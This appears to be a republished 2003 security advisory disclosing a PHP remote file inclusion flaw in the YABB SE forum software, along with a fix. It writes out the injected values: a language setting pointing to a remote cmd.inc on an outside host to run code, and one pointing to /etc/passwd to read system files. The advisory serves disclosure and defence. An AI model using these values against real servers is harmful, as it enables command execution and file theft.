logo Home

Untitled Document

Home > Archives Advisories > Articles


Untitled Document

Untitled Document

YABB SE, remote command execution
Date: 2003-04-22

Author : Fermín J. Serna <fjserna@ngsec.com>

Next Generation Security Technologies
http://www.ngsec.com
Security Advisory


Title: YABB SE, remote command execution.
ID: NGSEC-2003-5
Application: YABB SE up to 1.5.1
Date: 04/22/2003
Status: Vendor contacted, new fixed version available.
Platform(s): Unix & Windows OSs.
Author: Fermín J. Serna <fjserna@ngsec.com>
Location: http://www.ngsec.com/docs/advisories/NGSEC-2003-5.txt


Overview:
- ---------

YABB SE is a popular bulletin board. It consist on the port of YABB to
MySQL/PHP. Searching at Google "YABB SE" we found about 89,400 results,
confirming its popularity.

YABB SE suffers a PHP injection vulnerability (remote command execution)
in its language support. Any registered user can execute commands with Web
Server privileges (normally nobody).


Technical description:
- ----------------------

Any registered user can inject PHP code in YABB SE through its language
support. YABB SE does an include($language) where $language is the
selected language setting retrieved form the MySQL DataBase.

In order to exploit this vulnerability, you must have a registered user,
change your language setting through the "Change Profile" tab, using one
Pen-Test Web Proxy such as HttPush, to an evil value.

This action will update your language setting in the DataBase. Next
queries will include your evil language setting.

In order to inject PHP code, a malicious user could set the language
variable to for example "http://zhodiac.net-dreamer.net/cmd.inc"
where cmd.inc is the PHP code to inject.

It is also possible to use this vulnerability to access any file on the
server with Web Server privileges, only when safe_mode is disabled,
setting the language variable for example to /etc/passwd.


Recommendations:
- ----------------
Upgrade to a newer YABB SE version (at least 1.5.2).
Run YABB SE on a secure environment.

This vulnerability could not have been exploited on a NGSecureWeb(r)
protected Web Server.

Find more information on NGSecureWeb features at:

http://www.ngsec.com/ngproducts/ngsw/


- --
More security advisories at: http://www.ngsec.com/ngresearch/ngadvisories/
PGP Key: http://www.ngsec.com/pgp/labs.asc



 

arrowSearch Advisories

arrowNewsletter

Free weekly Newsletter.

Please enter your email address here:
arrowReport Vulnerability

If you've found a vulnerability please
click here to report it.
arrowPartners

newsnow

About Us | Contact Us | Advertise | email | Backend flag
Copyright © 2016-2017 Security Corporation - All Rights Reserved - Legal - Privacy Policy